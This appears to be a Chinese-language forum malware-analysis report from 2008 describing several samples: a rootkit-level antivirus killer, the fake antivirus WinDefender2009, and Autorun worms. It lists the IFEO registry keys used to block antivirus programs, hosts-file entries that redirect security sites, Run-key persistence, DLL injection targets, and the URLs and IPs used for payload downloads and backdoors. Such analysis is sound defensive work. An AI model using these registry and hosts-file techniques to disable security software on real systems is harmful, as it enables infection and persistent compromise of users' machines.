o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KVMonXP.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KVPreScan.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kwatch.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\lamapp.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\lockdown2000.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\luall.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\mcafee.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\microsoft.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\mon.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\moniker.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\MPFTRAY.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ms.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\N32ACAN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navapsvc.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navapw32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVLU32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVNT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navrunr.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVW.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVW32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navwnt.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\nisserv.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\nisum.exe
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\360safe.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\360safebox.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\360tray.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\anti.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\antivir.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\atrack.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVE32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avk.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVKSERV.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avp.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVPUPD.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avsynmgr.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVWIN95.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avxonsol.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\BLACKD.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\BLACKICE.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CCenter.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CFIND.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\cfinet.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\cfinet32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLAW95.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLAW95CT.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLEANER.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLEANER3.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DAVPFW.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\dbg.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\debu.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DV95.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DV95_O.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DVP95.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ECENGINE.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\EFINET32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ESAFE.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\explorewclass.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\F-PROT.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\f-prot95.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\f-stopw.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\fir.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\fp-win.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\FRW.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IAMAPP.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IAMSERV.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IBMASN.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ice.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IceSword.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICMOON.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\iom.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\iomon98.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\JED.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\Kabackreport.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\Kasmain.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kav32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kavstart.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kissvc.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KPFW32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KPPMain.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KRF.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KVMonXP.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KVPreScan.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kwatch.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\lamapp.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\lockdown2000.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\luall.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\mcafee.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\microsoft.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\mon.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\moniker.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\MPFTRAY.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ms.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\N32ACAN.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navapsvc.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navapw32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVLU32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVNT.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navrunr.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVW.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\NAVW32.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\navwnt.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\nisserv.exe]
o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\nisum.exe]
o Debugger = "svchost.exe"
備註:
HOSTS 文件修改: 127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
建立連線: l11.6600.org
下載網頁:
http://www.web179.cn/ad/count.asp?mac=00-00-00-00-00-00&os=Win
XP&ver=2.5.1202&temp=242656&key=261380
使用了傳統技術的 IFEO 來阻止防毒軟體執行,並透過 DLL 注入的方式,隱藏樣
本執行的痕跡
還加載多個驅動程式,是一個 rootkit 級的 KillAV
回到第一頁
WinDefender2009.exe 的分析報告
一般資訊
分析日期
可執行 :
檔案類型
上傳者 :
分析者 :
:
: 2008-12-10
是
: EXE
kitman231
integear
樣本骨幹圖 :
WinDefender2009.exe
└ k.txt
└qmgr0.dat
└qmgr1.dat
└WinDefender 2009.lnk
└WinDefender 2009.lnk
└uninstall.exe
└vb.ini
└windef.exe
└WinDefender.s1
└WinDefender.s2
└WinDefender.s3
└winnt.bmp
WinDefender2009.exe 的行為分析 :
建立檔案 :
WinDefender2009.exe //母體
C :\Windows\k.txt
C :\Documents and Settings\All Users\Application Data\qmgr0.dat
C :\Documents and Settings\All Users\Application Data\qmgr1.dat
C :\Documents and Settings\[UserName]\Desktop\WinDefender 2009.lnk //
捷徑,無害
C :\Documents and Settings\[UserName]\Start Menu\Programs\WinDefender
2009.lnk //捷徑,無害
C :\Program File\suninstall.exe
C :\Program File\vb.ini
C :\Program File\windef.exe //主要生成物
C :\Program File\WinDefender.s1
C :\Program File\WinDefender.s2
C :\Program File\WinDefender.s3
C :\Program File\winnt.bmp
建立新的處理程序 :
WinDefender2009.exe //母體
windef.exe //主要生成物
建立新的服務 :
BITS(狀態:執行)
建立新的登錄檔 :
[HKEY_CURRENT_USER\Software\WinDefender2009]
* Path = "%ProgramFiles%\WinDefender"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ThemeMan
ager]
* SystemID = 0x00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
* WinDefender2009 = "%ProgramFiles%\WinDefender\windef.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninsta
ll\WinDefender 2009]
* UninstallString = "%ProgramFiles%\WinDefender\Uninstall.exe"
* InstallLocation = "%ProgramFiles%\WinDefender"
* DisplayName = "WinDefender 2009"
* DisplayIcon = "%ProgramFiles%\WinDefender\windef.exe,0"
*
*
*
*
DisplayVersion = "3.4"
VersionMajor = 0x00000002
VersionMinor = 0x00000002
NoModify = 0x00000001
* NoRepair = 0x00000001
下載檔案 :
http://09021030408721.cn/cfg1. php
分析結果 :
病毒類型 : Trojan-FakeAlert
病毒檔案名:Trojan2008.12.24@009
回到第一頁
樣本名:Cu.exe
類型:Worm-Autorun
病毒檔案名:Worm2008.12.24@001
上傳者:mizuhara
分析者:asusp4b533
分析日期:20081206
分析工具:ThreatExpert
可執行:是
建立檔案:
c:\autorun.inf
%Temp%\tmp3.tmp
%Temp%\tmp5.tmp
%Temp%\WER4848.dir00\appcompat.txt
%Temp%\WER4848.dir00\manifest.txt
%Temp%\WER4848.dir00\spoolsv.exe.hdmp
%Temp%\WER4848.dir00\spoolsv.exe.mdmp
%Programs%\homeview\Uninstall.lnk
%ProgramFiles%\homeview\Uninstall.exe
c:\resycled\boot.com
%Windir%\Temp\tmp6.tmp
程序及記憶體行為:
執行檔案: %Temp%\jah32223.exe
c:\resycled\boot.com
DLL 遠端注入: %System%\dll.dll->%System%\spoolsv.exe
登錄檔建立行為:
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID
o
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Uninstall\homeview
o HKEY_CURRENT_USER\Software\homeview
o HKEY_CURRENT_USER\Software\{NSINAME}
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*]
+ DocumentInfo = 0x00000047
+ GlobalTip = 0x00000CD1
+ AutoTip = "rfx???|?{`"
+ Reserved = 0x6B02F719
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID]
+ (Default) = "{6BF52A52-394A-11D3-B153-00C04F79FAA6}"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Uninstall\homeview]
+ UninstallString = ""%ProgramFiles%\homeview\Uninstall.exe""
+ InstallLocation = "%ProgramFiles%\homeview"
+ DisplayName = "homeview"
+ DisplayIcon = "%ProgramFiles%\homeview\Uninstall.exe,0"
o [HKEY_CURRENT_USER\Software\homeview]
+ (Default) = "%ProgramFiles%\homeview"
o [HKEY_CURRENT_USER\Software\{NSINAME}]
+ Start Menu Folder = "homeview"
登錄檔修改行為:
*
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent]
o (Default) = 0x0000000C
*
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurr
ent]
o (Default) = 0x0000000C
備註:
建立連線: 94.247.2.107:80(可能導致後門)
回到第一頁
樣本名:k08aww.exe
類型:Worm-Autorun
病毒檔案名:Worm2008.12.24@003
上傳者:mizuhara
分析者:asusp4b533
分析日期:20081206
分析工具:ThreatExpert
可執行:是
建立檔案:
c:\autorun.inf
%Temp%\9f.dll
c:\k08aww.bat
%System%\kavo.exe
%System%\kavo0.dll
%System%\kavo1.dll
程序及記憶體行為:
執行檔案: %System%\kavo.exe
k08aww.exe
遠端建立記憶體空間: 建立於->%Windir%\explorer.exe
DLL 遠端注入: %System%\kavo0.dll->%Windir%\explorer.exe
登錄檔建立行為:
#
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru
n]
* kava = "%System%\kavo.exe"
登錄檔修改行為
#
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\Advanced\Folder\Hidden\SHOWALL]
* CheckedValue = 0x00000000
備註:
下載檔案: http://www.1a123.com/jj/cc.rar->%Temp%\cc.rar
標準的 Kxvo 行為
回到第一頁
樣本名:Setup_trnovirfrech_c.exe
類型:Virus-All
病毒檔案名:Virus2008.12.24@001
上傳者:kitman231
分析者:asusp4b533
分析日期:20081206
分析工具:ThreatExpert
可執行:是
建立檔案:
* %Temp%\.tt1.tmp
* %Temp%\.tt6B.tmp
* %Temp%\.tt1.tmp.vbs
* %System%\blphc35dj0erc1.scr
* %System%\lphc35dj0erc1.exe
* %System%\phc35dj0erc1.bmp
* %System%\Restore\MachineGuid.txt
程序及記憶體行為:
執行檔案: %System%\lphc35dj0erc1.exe
blphc35dj0erc1.scr
遠端建立記憶體空間: 建立於->%System%\svchost.exe
修改服務: 服務名->System Restore Service 服務->%System%\svchost.exe
-k netsvcs 狀態->Running
登錄檔建立行為:
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier
*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli
cies\System
* HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host
* HKEY_CURRENT_USER\Software\Microsoft\Windows Script
Host\Settings
* HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen
Saver
*
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run]
o lphc35dj0erc1 = "%System%\lphc35dj0erc1.exe"
so that lphc35dj0erc1.exe runs every time Windows starts
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier]
o InstallID = "a4d60ab5-6f2e-4270-8461-df8594e006ee"
* [HKEY_CURRENT_USER\Control Panel\Desktop]
o ConvertedWallpaper = "%System%\phc35dj0erc1.bmp"
o SCRNSAVE.EXE = "%System%\blphc35dj0erc1.scr"
*
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Pol
icies\System]
o NoDispBackgroundPage = 0x00000001
o NoDispScrSavPage = 0x00000001
* [HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen
Saver]
o EulaAccepted = 0x00000001
登錄檔修改行為:
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SystemRestore]
o DisableSR = 0x00000000
*
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ex
plorer\Shell Folders]
o AppData = "%Profiles%\NetworkService\Application Data"
o Cache = "%Profiles%\NetworkService\Local
Settings\Temporary Internet Files"
* [HKEY_CURRENT_USER\Control Panel\Colors]
o Background = "0 0 255"
* [HKEY_CURRENT_USER\Control Panel\Desktop]
o ScreenSaveActive = "1"
o Wallpaper = "%System%\phc35dj0erc1.bmp"
o WallpaperStyle = "0"
o OriginalWallpaper = "%System%\phc35dj0erc1.bmp"
備註:
下載網頁:http://windowsupdate.microsoft.com
localhost
http://avxp-2008.net/images/1224467073/9d1f0e1489a543dec127d
3af79e71e0f/a4d60ab5-6f2e-4270-8461-df8594e006ee.gif
疑似為綜合型病毒,會安裝後門,並且特別對螢幕(Display)顯示做破壞(安裝讓
使用者以為 BSOD 的模擬螢幕保護程式)
回到第一頁
A-Squared Anti-Malware 4.0
防毒軟體版本: 4.0.0.67
病毒碼: 2,477,867
啟發式設定: 無
測試環境: Windows XP SP3
